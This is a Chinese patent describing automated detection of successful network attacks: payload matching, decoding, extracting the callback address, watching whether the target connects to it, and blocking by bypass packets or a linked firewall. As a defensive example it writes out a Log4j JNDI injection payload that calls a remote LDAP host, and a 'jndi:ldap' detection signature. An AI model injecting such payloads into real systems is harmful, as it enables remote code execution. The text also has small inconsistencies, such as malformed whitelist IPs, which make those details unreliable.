一种检测网络攻击的方法、装置、电子设备及介质与流程

1.本技术实施例涉及网络安全领域，具体涉及一种检测网络攻击的方法、装置、电子设备及介质。


背景技术：

2.目前网络攻击越发猖獗，一个大型企业每天遭受的网络攻击在百万起以上。由于目前的网络安全检测设备大多以检测网络攻击过程为目标，忽略了对攻击结果的检测，因此，当某次网络攻击成功时，由于网络安全检测设备无法快速发现和处置，造成了非常大的损失。
3.为了解决上述问题，相关技术中使用人工对攻击结果进行审核，但人工审核耗时较长，发现目标设备已经被攻击成功的时间往往在被攻击成功发生的8小时以后，所以导致这段时间被攻击源用来窃取相关机密，造成无法挽回的损失。
4.因此，如何快速判断攻击是否成功成为需要解决的问题。


技术实现要素：

5.本技术实施例提供一种检测网络攻击的方法、装置、电子设备及介质，通过本技术的一些实施例至少能够快速判断由发送源设备发起的攻击是否成功，进而缩短处置攻击行为的时间，提高处理效率。
6.第一方面，本技术实施例提供了一种检测网络攻击的方法，应用于攻击检测设备，所述方法包括：获取发送源设备向目标设备发送的待检测数据；根据所述待检测数据判断所述发送源设备是否存在攻击所述目标设备的行为；在所述发送源设备存在所述行为的情况下，从所述待检测数据中提取恶意访问信息，其中，所述恶意访问信息用于所述目标设备访问待访问设备，所述待访问设备中存储有恶意程序；若所述目标设备通过所述恶意访问信息对所述待访问设备进行访问，则确认所述发送源设备对所述目标设备攻击成功。
7.因此，与相关技术中通过人工的方式判断攻击结果，本技术实施例通过攻击检测设备在确认发送源设备存在攻击行为的情况下，快速的判断攻击结果，能够自动判定攻击结果，从而缩短处置攻击行为的时间，提高处理效率。
8.结合第一方面，在本技术的一种实施方式中，所述恶意访问信息为地址信息；所述从所述待检测数据中提取恶意访问信息，包括：从所述待检测数据中提取所述地址信息；所述若所述目标设备通过所述恶意访问信息对所述待访问设备进行访问，则确认所述发送源设备对所述目标设备攻击成功，包括：所述若所述目标设备通过所述地址信息对所述待访问设备进行访问，则确认所述发送源设备对所述目标设备攻击成功。
9.因此，本技术实施例通过目标设备的后续行为判断目标设备被攻击成功，能够自动判定攻击结果，减少攻击的处置时间。
10.结合第一方面，在本技术的一种实施方式中，在所述从所述待检测数据中提取所述地址信息之后，所述方法还包括：确认白名单中不存在所述地址信息；将所述地址信息更
新到攻击特征库中，获得所述更新攻击特征库，其中，所述白名单中包括多个允许访问设备所对应的地址信息。
11.因此，本技术实施例通过将不在白名单中的地址信息更新到攻击特征库，能够提升后续网络攻击检测的效率。
12.结合第一方面，在本技术的一种实施方式中，在所述确认所述发送源设备对所述目标设备攻击成功之后，所述方法还包括：阻断所述目标设备与所述待访问设备之间的通信。
13.因此，本技术实施例通过阻断目标设备与待访问设备之间的通信，能够在短时间内阻断目标设备的对外连接，从而能够防止网络攻击蔓延，保护信息安全。
14.结合第一方面，在本技术的一种实施方式中，所述阻断所述目标设备与所述待访问设备之间的通信，包括：获取阻断数据包；基于所述目标设备的地址信息，向所述目标设备持续发送所述阻断数据包，以切断所述待访问设备与所述目标设备的通信连接。
15.因此，本技术实施例中，发送阻断数据包进行旁路阻断，能够实现攻击发现与阻断的一体化，将发现攻击与阻断紧紧地连接起来，可以做到发现目标设备被攻击成功后，立即对目标设备与待访问设备之间的连接进行阻断，将现有方法的时效性缩短到毫秒级的时效性。
16.结合第一方面，在本技术的一种实施方式中，所述阻断所述目标设备与所述待访问设备之间的通信，包括：将所述待访问设备的地址信息和所述目标设备的地址信息配置到联动的防火墙设备中，以使所述防火墙设备阻断所述待访问设备与所述目标设备的通信连接。
17.因此，本技术实施例中，能够保证发现目标设备被攻击成功后进行阻断，做到发现即阻断的毫秒级时差，即时有效的进行阻断并防止目标设备访问待访问设备，进而下载恶意程序。进行联动阻断时能够保证用户将更为方便地将目标设备与待访问设备之间的连接进行阻断，只需要在页面简单填入防火墙信息即可连接到防火墙进行阻断，不再需要手动进行阻断或者针对性的编写添加阻断脚本。
18.结合第一方面，在本技术的一种实施方式中，所述从所述待检测数据中提取所述地址信息，包括：对所述待检测数据进行解码，获得解码检测数据；提取所述解码检测数据中包括的所述地址信息。
19.结合第一方面，在本技术的一种实施方式中，所述对所述待检测数据进行解码，获得解码检测数据，包括：识别所述待检测数据的编码规则；基于所述编码规则对所述待检测数据进行解码，获得所述解码检测数据。
20.因此，本技术实施例通过编码规则对待检测数据进行解码，能够准确的获得解码检测数据，从而能够获得准确的地址信息。
21.结合第一方面，在本技术的一种实施方式中，所述待检测数据包括访问方式特征；所述根据所述待检测数据判断所述发送源设备是否存在攻击所述目标设备的行为，包括：确认所述攻击特征库中存在所述访问方式特征，则确认所述发送源设备存在攻击所述目标设备的行为。
22.因此，本技术实施例通过访问方式特征判断发送源设备是否存在攻击行为，能够在观察目标设备的后续行为之前确定存在网络攻击事件，从而减少误判的情况发生。
23.第二方面，本技术实施例提供了一种检测网络攻击的装置，应用于攻击检测设备，所述装置包括：数据获取模块，被配置为获取发送源设备向目标设备发送的待检测数据；行为识别模块，被配置为根据所述待检测数据判断所述发送源设备是否存在攻击所述目标设备的行为；信息确认模块，被配置为在所述发送源设备存在所述行为的情况下，从所述待检测数据中提取恶意访问信息，其中，所述恶意访问信息用于所述目标设备访问待访问设备，所述待访问设备中存储有恶意程序；攻击成功确认模块，被配置为若所述目标设备通过所述恶意访问信息对所述待访问设备进行访问，则确认所述发送源设备对所述目标设备攻击成功。
24.结合第二方面，在本技术的一种实施方式中，所述恶意访问信息为地址信息；所述信息确认模块还被配置为：从所述待检测数据中提取所述地址信息；所述攻击成功确认模块还被配置为：所述若所述目标设备通过所述地址信息对所述待访问设备进行访问，则确认所述发送源设备对所述目标设备攻击成功。
25.结合第二方面，在本技术的一种实施方式中，所述信息确认模块还被配置为：确认白名单中不存在所述地址信息；将所述地址信息更新到攻击特征库中，获得所述更新攻击特征库，其中，所述白名单中包括多个允许访问设备所对应的地址信息。
26.结合第二方面，在本技术的一种实施方式中，所述攻击成功确认模块还被配置为：阻断所述目标设备与所述待访问设备之间的通信。
27.结合第二方面，在本技术的一种实施方式中，所述攻击成功确认模块还被配置为：获取阻断数据包；基于所述目标设备的地址信息，向所述目标设备持续发送所述阻断数据包，以切断所述待访问设备与所述目标设备的通信连接。
28.结合第二方面，在本技术的一种实施方式中，所述攻击成功确认模块还被配置为：将所述待访问设备的地址信息和所述目标设备的地址信息配置到联动的防火墙设备中，以使所述防火墙设备阻断所述待访问设备与所述目标设备的通信连接。
29.结合第二方面，在本技术的一种实施方式中，所述信息确认模块还被配置为：对所述待检测数据进行解码，获得解码检测数据；提取所述解码检测数据中包括的所述地址信息。
30.结合第二方面，在本技术的一种实施方式中，所述信息确认模块还被配置为：识别所述待检测数据的编码规则；基于所述编码规则对所述待检测数据进行解码，获得所述解码检测数据。
31.结合第二方面，在本技术的一种实施方式中，所述待检测数据包括访问方式特征；所述行为识别模块，被配置为：确认所述攻击特征库中存在所述访问方式特征，则确认所述发送源设备存在攻击所述目标设备的行为。
32.第三方面，本技术实施例提供了一种电子设备，包括：处理器、存储器和总线；所述处理器通过所述总线与所述存储器相连，所述存储器存储有计算机可读取指令，当所述计算机可读取指令由所述处理器执行时，用于实现如第一方面任意实施例所述的方法。
33.第四方面，本技术实施例提供了一种计算机可读存储介质，该计算机可读存储介质上存储有计算机程序，该计算机程序被执行时实现如第一方面任意实施例所述的方法。
附图说明
34.图1为本技术实施例示出的一种检测网络攻击的场景组成示意图；图2为本技术实施例示出的检测网络攻击的方法流程图之一；图3为本技术实施例示出的检测网络攻击的方法流程图之二；图4为本技术实施例示出的检测网络攻击的方法流程图之三；图5为本技术实施例示出的检测网络攻击的装置组成示意图；图6为本技术实施例示出的一种电子设备组成示意图。
具体实施方式
35.为使本技术实施例的目的、技术方案和优点更加清楚，下面将结合本技术实施例中附图，对本技术实施例中的技术方案进行清楚、完整的描述，显然，所描述的实施例仅仅是本技术的一部分实施例，而不是全部实施例。通常在此处附图中描述和示出的本技术实施例的组件可以以各种不同的配置来布置和设计。因此，以下对附图中提供的本技术的实施例的详情描述并非旨在限制要求保护的本技术的范围，而是仅仅表示本技术的选定实施例。基于本技术的实施例，本领域技术人员在没有做出创造性劳动的前提下所获得的所有其他实施例，都属于本技术保护范围。
36.本技术实施例可以应用于检测目标设备是否被攻击成功的场景，例如，本技术实施例通过判断目标设备是否根据恶意访问信息对待访问设备进行访问，来确认目标设备是否被攻击成功。例如，为了改善背景技术中攻击成功判断响应慢的问题，在本技术的一些实施例中，在确定发送源设备存在攻击目标设备的行为的情况下，通过目标设备是否使用恶意访问信息对待访问设备进行访问，来确认目标设备是否被攻击成功。由于本技术实施例在确认发送源设备存在攻击目标设备的行为后，继续监测目标设备的后续行为（即目标设备是否使用恶意访问信息对待访问设备进行访问），因此能够快速的确认目标设备被攻击成功。
37.下面结合附图详细描述本技术实施例中的方法步骤。
38.图1提供了本技术一些实施例中的检测网络攻击的场景组成示意图，该场景包括：发送源设备110、目标设备120、待访问设备130和攻击检测设备140。具体的，攻击检测设备140是一个可以获取局域网（例如，该局域网是由图1中所示的目标设备120、待访问设备130和攻击检测设备140组成的）内所有设备交互数据的网关设备，用于对输入、输出局域网的所有数据、局域网内部设备的交互数据等进行监控。
39.也就是说，攻击检测设备140获取外网设备（例如，发送源设备110），向目标设备120传输的待检测数据，之后攻击检测设备140根据待检测数据和目标设备120的后续行为（例如，目标设备120访问待访问设备130的行为），来判断目标设备120是否被攻击成功。
40.需要说明的是，相关技术通常使用人工对攻击结果进行审核，但人工审核耗时较长，发现目标设备已经被攻击成功的时间往往在被攻击成功发生的8小时以后，所以导致这段时间被攻击源用来窃取相关机密，造成无法挽回的损失，因此需要一种可以精准的检测网络攻击的攻击结果，并且可以做到自动化处置的方法。与现有技术不同的是，本技术实施例在确认发送源设备存在攻击目标设备的行为之后，检测目标设备的后续行为，以判断目标设备是否被攻击成功。
41.下面以攻击检测设备为例示例性阐述本技术一些实施例提供的检测网络攻击的方案。可以理解的是，本技术实施例的检测网络攻击的方案可以应用于任何安全设备上，例如，防火墙产品上。
42.至少为了解决背景技术中的问题，如图2所示，本技术一些实施例提供了一种检测网络攻击的方法，该方法包括：s210，获取发送源设备向目标设备发送的待检测数据。
43.需要说明的是，作为本技术一种具体示例，发送源设备是发送待检测数据的外网设备。例如，假设内网是安全的，则发送源设备是指外网设备。对于内网的大小本技术的实施例不做限制。例如，内网可能是一个大学对应的网络，有可能是一家公司对应的网络，还可能是一座城市对应的网路等，如果内网是一所大学的网络， 则发送源设备就是所有试图访问校园内网的所有外网设备。
44.可以理解的是，作为本技术一具体实施例，目标设备是发送源设备想要进行网络攻击的设备，在本技术实施例的场景中，攻击检测设备通过流量镜像的方式监控局域网内所有的流量。例如在监控的过程中发现：发送源设备控制目标设备访问待访问设备，之后使目标设备从待访问设备中下载恶意程序（例如，病毒程序），进而执行恶意程序。
45.其中，网络攻击是利用网络信息系统存在的漏洞和安全缺陷对系统和资源进行攻击的行为。流量镜像是通过在交换机或路由器上，将一个或多个源端口的数据流量转发到某一个指定端口（例如，攻击检测设备的端口）来实现对网络的监听。
46.可以理解的是，待检测数据是发送源设备与目标设备之间的通信数据。在本技术一具体实施例中，待检测数据是正常的载荷数据，即不具备攻击能力。在本技术另一具体实施例中，待检测数据是攻击载荷数据，即攻击载荷数据是可以进入目标设备中运行的恶意代码。
47.s220，根据待检测数据判断发送源设备是否存在攻击目标设备的行为。
48.在本技术的一种实施方式中，待检测数据包括访问方式特征，s220包括：确认攻击特征库中存在访问方式特征，则确认发送源设备存在攻击目标设备的行为。
49.也就是说，将待检测数据中的访问方式特征与攻击特征库中的特征进行对比，若攻击特征库中不存在待检测数据中的访问方式特征，则说明该待检测数据不是攻击载荷，是正常的流量数据。若攻击特征库中存在待检测数据中的访问方式特征，则说明该待检测数据是攻击载荷，从而能够判断发送源设备存在攻击目标设备的行为，即发送源设备攻击了目标设备。
50.例如：待检测数据为“${jndi:ldap://3.3.3.3/exp}”，则其中的访问方式特征为“jndi:ldap”，将访问方式特征与攻击特征库中的特征进行对比，发现攻击特征库中存在“jndi:ldap”，则判定该待检测数据为攻击载荷，同时确认发送该攻击载荷的发送源设备存在攻击行为，即检测到了网络攻击事件。
51.因此，本技术实施例通过访问方式特征判断发送源设备是否存在攻击行为，能够在观察目标设备的后续行为之前确定存在网络攻击事件，从而减少误判的情况发生。
52.s230，在发送源设备存在该行为的情况下，从待检测数据中提取恶意访问信息。
53.需要说明的是，在确定发送源设备存在网络攻击行为之后，待检测数据则为攻击载荷。
54.在本技术的一种实施方式中，恶意访问信息包括地址信息，s230包括：在发送源设备存在该行为的情况下，从待检测数据中提取所述地址信息。
55.也就是说，本技术实施例在s220中判断发送源设备对目标设备存在攻击行为之后，需要对目标设备进行后续的行为观察，从而确定对目标设备的攻击结果。即通过从攻击载荷中提取地址信息，通过该地址信息明确目标设备可能访问的待访问设备。
56.可以理解的是，地址信息是攻击载荷中包括的待访问设备的地址信息，目标设备能够根据地址信息访问待访问设备。作为本技术一具体实施方式，地址信息可以是网际互连协议（internet protocol，ip）地址。作为本技术另一具体实施方式，地址信息可以是统一资源定位器（uniform resource locator，url）地址。作为本技术再一具体实施方式，地址信息可以是域名。本技术对地址信息的类型不作限制。
57.例如，地址信息为ip地址，攻击载荷为“${jndi:ldap://3.3.3.3/exp}”，提取攻击载荷中的ip地址为“3.3.3.3”，则确定“3.3.3.3”为待访问设备的ip地址，是恶意访问信息。
58.需要说明的是，恶意访问信息包括所有能够访问待访问设备的途径所对应的信息。作为本技术一种具体实施例，恶意访问信息还可以是端口信息、设备编号信息等。
59.在本技术的一种实施方式中从待检测数据中提取地址信息的具体步骤如下所示：s1：对待检测数据进行解码，获得解码检测数据。
60.具体的，首先，识别待检测数据的编码规则。然后，基于编码规则对待检测数据进行解码，获得解码检测数据。
61.也就是说，如图3所示，通过攻击载荷解码引擎310自动识别攻击载荷的编码规则，例如，编码规则包括base64编码、url编码、超文本标记语言（hyper text markup language，html）编码等。之后，在明确编码规则的情况下，获取与编码规则相对应的解码规则，并且使用解码规则对攻击载荷进行解码，获得解码检测数据。
62.可以理解的是，在解码的过程中需要至少一层解码。作为本技术一具体实施例，使用解码规则对攻击载荷进行一层解码，获得解码检测数据。作为本技术另一具体实施例，使用解码规则对攻击载荷进行多层解码，获得解码检测数据，例如，使用解码规则对攻击载荷进行三层解码，获得解码检测数据。
63.因此，本技术实施例通过编码规则对待检测数据进行解码，能够准确的获得解码检测数据，从而能够获得准确的地址信息。
64.s2：提取解码检测数据中包括的地址信息。
65.也就是说，如图3所示，在获得解码检测数据之后，使用特征提取引擎320从解码检测数据中提取出地址信息，其中，地址信息可以是ip地址、端口号、域名、url地址等。
66.可以理解的是，解码检测数据是被解码之后的明文信息。
67.在本技术的一种实施方式中，在提取地址信息之后，还包括：s1：确认白名单中不存在地址信息。
68.需要说明的是，在攻击检测设备中会预先配置白名单，例如，白名单可以是某公司的ip信誉库。其中，白名单中包括多个允许访问设备所对应的地址信息。例如，白名单中包括允许访问的第一设备相对应的ip地址为4.4.4、允许访问的第二设备相对应的ip地址为5.5.5。可以理解的是，白名单的配置是按照实际的应用情况和历史数据决定的，本技术不对白名单中包括的内容进行限制。
69.作为s1的具体实施方式，在获得地址信息之后，在白名单中查找该地址信息，若该地址信息不属于白名单，则说明该地址信息所对应的设备不被信任，不属于允许访问的设备范围。
70.s2：将地址信息更新到攻击特征库中。
71.也就是说，在地址信息不在白名单的范围内，则将地址信息更新到攻击特征库中，获得更新攻击特征库。需要理解的是，更新攻击特征库可以在后续对网络攻击进行检测的过程中使用。
72.例如，将提取出的ip地址、端口号、域名、url地址等进行白名单过滤，如果ip地址、端口号、域名、url地址等不属于白名单，则将上述地址信息更新到攻击特征库中。
73.因此，本技术实施例通过将不在白名单中的地址信息更新到攻击特征库，能够提升后续网络攻击检测的效率。
74.s240，若目标设备通过恶意访问信息对待访问设备进行访问，则确认发送源设备对目标设备攻击成功。
75.在本技术的一种实施方式中，s240包括：若目标设备通过地址信息对待访问设备进行访问，则确认发送源设备对目标设备攻击成功。
76.也就是说，在提取得到地址信息之后，需要持续检测目标设备的后续网络行为。当目标设备接收到地址信息之后，若目标设备被攻击成功了则会根据地址信息生成访问待访问设备的链接，以使能够通过该连接去访问待访问设备（例如，目标设备去待访问设备下载恶意程序）。若目标设备没有被攻击成功，则不会生成链接去访问待访问设备，进而也就不会下载恶意程序。
77.基于此，本技术实施例持续检测目标设备的域名系统（domain name system，dns）请求、传输控制协议（transmission control protocol，tcp）/用户数据报协议（user datagram protocol，udp）连接请求、url访问等应用数据，当发现上述dns请求、tcp/udp链接请求、url访问等应用数据中包括地址信息（例如，ip地址、端口号、域名、url地址等）属于攻击特征库，则确认发送源设备对目标设备攻击成功。
78.因此，本技术实施例通过目标设备的后续行为判断目标设备被攻击成功，能够自动判定攻击结果，减少攻击的处置时间。
79.在本技术的一种实施方式中，在s240之后还包括：阻断目标设备与待访问设备之间的通信。
80.也就是说，若目标设备被攻击成功，目标设备会根据地址信息生成链接去待访问设备下载恶意程序。在当判断目标设备被攻击成功时，立即阻断目标设备与待访问设备之间的通信，中断目标设备下载恶意程序。
81.例如，自动阻断目标设备与待访问设备之间的通信分为旁路阻断和防火墙联动阻断。在确认目标设备被攻击成功时，第一时间阻断该目标设备的所有对外网络连接。
82.因此，本技术实施例通过阻断目标设备与待访问设备之间的通信，能够在短时间内阻断目标设备的对外连接，从而能够防止网络攻击蔓延，保护信息安全。
83.在本技术的一种实施方式中，阻断目标设备与待访问设备之间的通信可以包括多种阻断方式，当阻断方式为旁路阻断时，s240包括：获取阻断数据包，基于目标设备的地址信息，向目标设备持续发送阻断数据包，以
切断待访问设备与目标设备的通信连接。
84.具体的，当阻断方式为旁路阻断时，获取阻断数据包，并在阻断时间内基于目标设备的地址信息持续发送阻断数据包至目标设备，以切断待访问设备与目标设备的通信连接，并结束本流程。
85.本技术实施例中，当阻断方式为旁路阻断时，会通过向目标设备发送阻断数据包，切断目标设备与待访问设备的连接，进而使目标设备不能下载待访问设备中存储的恶意程序。
86.本技术实施例中，在旁路阻断中，用户还可以可添加阻断白名单、切换手动自动模式、对已阻断目标设备的阻断时间进行设置等进行灵活阻断。
87.因此，本技术实施例中，发送阻断数据包进行旁路阻断，能够实现攻击发现与阻断的一体化，将发现攻击与阻断紧紧地连接起来，可以做到发现目标设备被攻击成功后，立即对目标设备与待访问设备之间的连接进行阻断，将现有方法的时效性缩短到毫秒级的时效性。
88.在本技术的一种实施方式中，当阻断方式为联动阻断时，s240包括：将待访问设备的地址信息和目标设备的地址信息配置到联动的防火墙设备中，以使防火墙设备阻断待访问设备与目标设备的通信连接。
89.当阻断方式为联动阻断时，将待访问设备的地址信息和目标设备的地址信息配置到联动的防火墙设备中，以使防火墙设备对待访问设备与目标设备之间的通信进行阻断处理。
90.本技术实施例中，当阻断方式为联动阻断时，会通过将待访问设备的地址信息和目标设备的地址信息添加至防火墙等设备中，防止目标设备访问待访问设备，并且下载恶意程序。
91.本技术实施例中，联动阻断中用户也可以对是否对本技术实施例中，进行阻断、阻断时间等配置进行灵活阻断。
92.本技术实施例中，该方法集成了多种防火墙接口信息，用户可以预先配置即可连接到已经在使用中的防火墙。后续在更换其它类型的防火墙时，也仅仅只需在节点简单修改配置即可，解决了现有技术中需要针对防火墙针对性编写调用脚本的缺陷。
93.因此，本技术实施例中，能够保证发现目标设备被攻击成功后进行阻断，做到发现即阻断的毫秒级时差，即时有效的进行阻断并防止目标设备访问待访问设备，进而下载恶意程序。进行联动阻断时能够保证用户将更为方便地将目标设备与待访问设备之间的连接进行阻断，只需要在页面简单填入防火墙信息即可连接到防火墙进行阻断，不再需要手动进行阻断或者针对性的编写添加阻断脚本。
94.本技术实施例中，实施上述阻断目标设备与待访问设备之间的通信，能够对目标设备下载待访问设备的恶意程序的行为进行阻断处理。
95.可见，实施本实施例所描述的检测网络攻击的方法，能够在检测到目标设备被攻击时，及时对发现的目标设备下载恶意程序的行为进行实时阻断，从而维护网络安全。
96.上文描述了本技术中的一种检测网络攻击的方法，下文将描述本技术中一种检测网络攻击的具体实施例。
97.如图4所示，检测网络攻击的具体实施例需要网络攻击识别引擎420、攻击特征库
430、攻击载荷分析引擎440、白名单过滤模块450和自动处置模块460来执行。
98.具体的，首先网络攻击识别引擎420根据检测规则对网络行为410进行匹配，确认发生了网络攻击事件，并且根据规则提取出攻击载荷。然后，攻击载荷分析引擎440对攻击载荷进行解码，并且提取出内部的ip地址、端口号、域名和url地址等地址信息。接着，将上述地址信息输入到白名单过滤模块450，将属于白名单中的地址信息输入到攻击特征库430中。接着，使用攻击特征匹配引擎持续检测目标设备的后续网络行为，包括dns请求、tcp/udp连接请求、url访问等应用数据，当发现链接的域名/ip端口、url地址等符合攻击特征库中的数据时，则判定为攻击成功。最后自动处置模块460第一时间阻断目标设备的所有对外网络连接。
99.作为本技术一具体实施例，发送源设备a的地址为1.1.1.1，目标设备b的地址为2.2.2.2，待访问设备c的地址为3.3.3.3，发送源设备a的任务是让目标设备b去待访问设备c下载一个恶意程序（例如，病毒）并且执行。具体的，发送源设备a若利用log4j漏洞进行攻击，则需要把攻击载荷发送给目标设备b，其中，攻击载荷为“${jndi:ldap://3.3.3.3/exp}”。攻击检测设备根据攻击载荷中的“${jndi:ldap://”识别出发送源设备a对目标设备b发起了攻击，接下来从攻击载荷中提取出待访问设备c的ip地址为“3.3.3.3”，之后将该ip地址自动加入攻击特征库（即黑名单）中。随后，观察目标设备b的流量中是否存在目标设备b连接待访问设备c的请求，若发现请求，则证明发送源设备a攻击目标设备b成功，说明目标设备b确实存在相对应的漏洞。同时第一时间阻断目标设备b到待访问设备c的请求，阻止目标设备b下载恶意程序。
100.因此，本技术实施例通过分析目标主机行为，自动检测网络攻击，提取攻击载荷，在攻击载荷中提取关键的ip地址，并结合目标主机的后续网络行为（即观察目标设备的流量中是否存在目标设备连接待访问设备的请求），从而实现自动判定攻击结果。若判断攻击成功可自动化处置，进行网络阻断，防止事态扩大，整体处置流程可控制在3秒以内。
101.因此，本技术中的攻击检测设备提供了自动判定攻击结果的功能，从攻击载荷中提取攻击成功特征，并根据特征进行攻击结果判定，实现了攻击自动处置，将整体发现到处置时间从8小时以上缩短到3秒以内。
102.上文描述了一种检测网络攻击的具体实施例，下文将描述一种检测网络攻击的装置。
103.如图5所示，一种检测网络攻击的装置500，包括：数据获取模块510、行为识别模块520、信息确认模块530和攻击成功确认模块540。
104.数据获取模块510，被配置为获取发送源设备向目标设备发送的待检测数据。
105.行为识别模块520，被配置为根据所述待检测数据判断所述发送源设备是否存在攻击所述目标设备的行为。
106.信息确认模块530，被配置为在所述发送源设备存在所述行为的情况下，从所述待检测数据中提取恶意访问信息，其中，所述恶意访问信息用于所述目标设备访问待访问设备，所述待访问设备中存储有恶意程序。
107.攻击成功确认模块540，被配置为若所述目标设备通过所述恶意访问信息对所述待访问设备进行访问，则确认所述发送源设备对所述目标设备攻击成功。
108.在本技术的一种实施方式中，所述恶意访问信息为地址信息；所述信息确认模块
530还被配置为：从所述待检测数据中提取所述地址信息；所述攻击成功确认模块540还被配置为：所述若所述目标设备通过所述地址信息对所述待访问设备进行访问，则确认所述发送源设备对所述目标设备攻击成功。
109.在本技术的一种实施方式中，所述信息确认模块530还被配置为：确认白名单中不存在所述地址信息；将所述地址信息更新到攻击特征库中，获得所述更新攻击特征库，其中，所述白名单中包括多个允许访问设备所对应的地址信息。
110.在本技术的一种实施方式中，所述攻击成功确认模块540还被配置为：阻断所述目标设备与所述待访问设备之间的通信。
111.在本技术的一种实施方式中，所述攻击成功确认模块540还被配置为：获取阻断数据包；基于所述目标设备的地址信息，向所述目标设备持续发送所述阻断数据包，以切断所述待访问设备与所述目标设备的通信连接。
112.在本技术的一种实施方式中，所述攻击成功确认模块540还被配置为：将所述待访问设备的地址信息和所述目标设备的地址信息配置到联动的防火墙设备中，以使所述防火墙设备阻断所述待访问设备与所述目标设备的通信连接。
113.在本技术的一种实施方式中，所述信息确认模块530还被配置为：对所述待检测数据进行解码，获得解码检测数据；提取所述解码检测数据中包括的所述地址信息。
114.在本技术的一种实施方式中，所述信息确认模块530还被配置为：识别所述待检测数据的编码规则；基于所述编码规则对所述待检测数据进行解码，获得所述解码检测数据。
115.在本技术的一种实施方式中，所述待检测数据包括访问方式特征；所述行为识别模块520，被配置为：确认所述攻击特征库中存在所述访问方式特征，则确认所述发送源设备存在攻击所述目标设备的行为。
116.在本技术实施例中，图5所示模块能够实现图1至图4方法实施例中的各个过程。图5中的各个模块的操作和/或功能，分别为了实现图1至图4中的方法实施例中的相应流程。具体可参见上述方法实施例中的描述，为避免重复，此处适当省略详细描述。
117.如图6所示，本技术实施例提供一种电子设备600，包括：处理器610、存储器620和总线630，所述处理器通过所述总线与所述存储器相连，所述存储器存储有计算机可读取指令，当所述计算机可读取指令由所述处理器执行时，用于实现如上述所有实施例中任一项所述的方法，具体可参见上述方法实施例中的描述，为避免重复，此处适当省略详细描述。
118.其中，总线用于实现这些组件直接的连接通信。其中，本技术实施例中处理器可以是一种集成电路芯片，具有信号的处理能力。上述的处理器可以是通用处理器，包括中央处理器（central processing unit，简称cpu）、网络处理器（network processor，简称np）等；还可以是数字信号处理器（dsp）、专用集成电路（asic）、现成可编程门阵列（fpga）或者其他可编程逻辑器件、分立门或者晶体管逻辑器件、分立硬件组件。可以实现或者执行本技术实施例中的公开的各方法、步骤及逻辑框图。通用处理器可以是微处理器或者该处理器也可以是任何常规的处理器等。
119.存储器可以是，但不限于，随机存取存储器（random access memory，ram），只读存储器（read only memory，rom），可编程只读存储器（programmable read-only memory，prom），可擦除只读存储器（erasable programmable read-only memory，eprom），电可擦除只读存储器（electric erasable programmable read-only memory，eeprom）等。存储器中
存储有计算机可读取指令，当所述计算机可读取指令由所述处理器执行时，可以执行上述实施例中所述的方法。
120.可以理解，图6所示的结构仅为示意，还可包括比图6中所示更多或者更少的组件，或者具有与图6所示不同的配置。图6中所示的各组件可以采用硬件、软件或其组合实现。
121.本技术实施例还提供一种计算机可读存储介质，该计算机可读存储介质上存储有计算机程序，该计算机程序被服务器执行时实现上述所有实施方式中任一所述的方法，具体可参见上述方法实施例中的描述，为避免重复，此处适当省略详细描述。
122.以上所述仅为本技术的优选实施例而已，并不用于限制本技术，对于本领域的技术人员来说，本技术可以有各种更改和变化。凡在本技术的精神和原则之内，所作的任何修改、等同替换、改进等，均应包含在本技术的保护范围之内。应注意到：相似的标号和字母在下面的附图中表示类似项，因此，一旦某一项在一个附图中被定义，则在随后的附图中不需要对其进行进一步定义和解释。
123.以上所述，仅为本技术的具体实施方式，但本技术的保护范围并不局限于此，任何熟悉本技术领域的技术人员在本技术揭露的技术范围内，可轻易想到变化或替换，都应涵盖在本技术的保护范围之内。因此，本技术的保护范围应所述以权利要求的保护范围为准。